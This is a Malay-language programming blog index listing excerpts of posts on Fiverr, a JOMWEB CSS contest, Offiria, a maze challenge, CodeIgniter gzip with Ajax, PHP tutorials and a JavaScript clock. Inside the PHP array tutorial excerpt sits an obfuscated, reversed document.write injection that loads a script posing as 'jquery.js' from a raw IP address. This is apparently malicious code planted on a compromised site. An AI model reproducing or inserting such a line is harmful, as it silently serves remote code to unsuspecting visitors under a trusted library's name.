Pengalaman Pertama Menyempurnakan Jualan $5 Di Fiverr.com

Beberapa minggu lepas saya mencuba Fiverr.com sebagai penjual. Fiverr.com adalah sebuah laman web marketplace yang mengumpulkan penjual dan pembeli. Di sini anda boleh menjual dan membeli perkhidmatan (bermula) pada $5USD. Anda boleh dapatkan seseorang untuk melukis, membuat video, melakukan perkara aneh, membina laman web, membuat kerja-kerja terjemahan dan bermacam-macam lagi. Dah lama saya anggotai Fiverr […]

Cabaran Web CSS Layout di JOMWEB dengan Hadiah Ratusan Ringgit

Ianya bermula secara suka-suka. Tetapi nampaknya macam semakin serius. Beberapa rakan-rakan menawar diri untuk menjadi penaja. Dan cubaan saya menghubungi beberapa pihak nampaknya berhasil apabila JetBrains bersetuju menaja lesen versi peribadi untuk PhpStorm bagi pemenang. Apa yang berlaku adalah di mana JOMWEB sedang menganjurkan sebuah pertandingan di mana developer yang ingin turut serta perlu membangunkan […]

Offiria Kini Open Source – Aplikasi Social Network untuk Organisasi dan Korporat

Offiria, sebuah aplikasi social network untuk organisasi dan korporat kini diberikan kepada umum secara percuma sebagai sebuah aplikasi open source. Offiria adalah sebuah produk oleh Azrul Rahim di bawah syarikatnya Slashes and Dots Sdn. Bhd., yang sebelum ini menerajui JomSocial.com (telah dijual). Bagi yang kurang mengetahui jenis aplikasi sebegini, budaya web intranet dalam korporat dan organisasi […]

Mencari Jalan Pulang: Cabaran Programming Maze dari Lizard-Apps.com

Lebih kurang dua minggu lepas, saya menjumpai blog Menno dari Lizard-Apps.com yang mencabar programmer untuk menyelesaikan masalah maze dengan menulis algorithm dalam apa jua bahasa yang kita biasa. Saya rasa ianya agak menarik. Maka saya pun mencubanya. Saya tidak menulis apa-apa di blog ini pada ketika itu kerana saya ingin membiarkan Menno mengumumkan hasil penyertaan umum […]

Hati-hati Dengan Compress Output (GZip) Codeigniter dan Ajax

Menggunakan compression (pemadatan?) Gzip bersama Codeigniter untuk menghantar data ke browser boleh mempercepatkan web kita. Namun kita perlu berhati-hati sekiranya kita banyak menggunakan Ajax dan JSON. Untuk membolehkan data dihantar dengan compression, kita boleh menukar setting kita di application/config/config.php. $config[‘compress_output’] = TRUE; Tapi ianya berfungsi bersama $this->load->view(). Segalanya akan rosak sekiranya kita menggunakan arahan echo di […]

Video: Tutorial Array Dengan PHP

Ini lagi video tutorial yang saya letakkan di YouTube. Ia mengajar array, indexed array, associative array, dan juga teknik-teknik untuk membuat grouping. Bahagian 1 – http://www.youtube.com/watch?v=ExhWMWUQnGU Bahagian 2 – http://www.youtube.com/watch?v=PNoY-Nt11q4 Teknik Grouping Bahagian 3 – http://www.youtube.com/watch?v=I9D09P8ug2E Bahagian 4 – http://www.youtube.com/watch?v=Cs3YCw9c7rI Bahagian 5 – http://www.youtube.com/watch?v=OjzYOk_jNI4 Download Source Code di Github.com https://github.com/kidino/Tutorial-Array-PHP document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs

Video: Association Rules dengan PHP dan MySQL

Lebih kurang setahun lepas, saya membuat video tutorial di YouTube untuk menyelesaikan masalah Association Rules dengan PHP dan MySQL. Sebelum ni saya hanya letakkan source code di laman web. Dan web itu saya dah tak guna lagi, akaun web hosting telah saya tutup. Terlupa saya yang video tutorial YouTube itu mempunyai pautan ke situ. Baru-baru […]

Jam Berasaskan Javascript Dengan Animasi CSS3

Di JOMWEB.my, bermula dengan soalan teman-teman junior yang banyak berkisarkan array dan looping, satu idea telah diutarakan agar dibuat “programming challenge”. Dan dicadangkan oleh ahli yang lain pula untuk membina sebuah jam berasaskan javascript. Maka ini adalah entri saya. Animated Javascript Clock with CSS3 (move.js) [ http://iszuddinismail.com/js-clock ] Boleh “view source” untuk tengok macam mana saya buat. […]